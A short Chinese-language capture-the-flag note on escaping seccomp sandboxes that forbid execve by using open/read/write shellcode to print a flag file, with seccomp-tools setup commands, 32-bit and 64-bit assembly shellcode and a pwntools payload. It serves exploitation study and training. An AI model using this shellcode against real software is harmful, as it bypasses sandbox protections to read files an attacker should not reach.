sandbox_orw
sandbox一般就是禁用了execve函数使我们没办法直接通过system(/bin/sh\x00)来getshell。如果会出现prctl,seccomp的话很可能就要用orw进行绕过。就是利用open,read,write(orw)。
首先用seccomp-tools查看沙箱
1
2
3
| sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
seccomp-tools dump ./elf
|
shellcode绕过
x32
汇编代码
1
2
3
4
|
shellcode=asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
shellcode+=asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
shellcode+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')
|
利用pwntools
1
2
3
4
| payload = shellcraft.i386.open('flag.txt')
payload += shellcraft.i386.read(0x3, save_to, 0x100)
payload += shellcraft.i386.write(0x1, save_to, 0x100)
sh.sendline(asm(payload))
|
x64
汇编代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| shellcode=f"""
xor rsi,rsi;
xor rdx,rdx;
push rdx;
mov rax,{convert_str_asmencode("././flag")};#根据文件名改动
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;
mov rdi,rax;
mov dl,0x40;
mov rsi,rsp
mov al,0;
syscall;
xor rdi,rdi;
mov al,1;
syscall;
"""
|
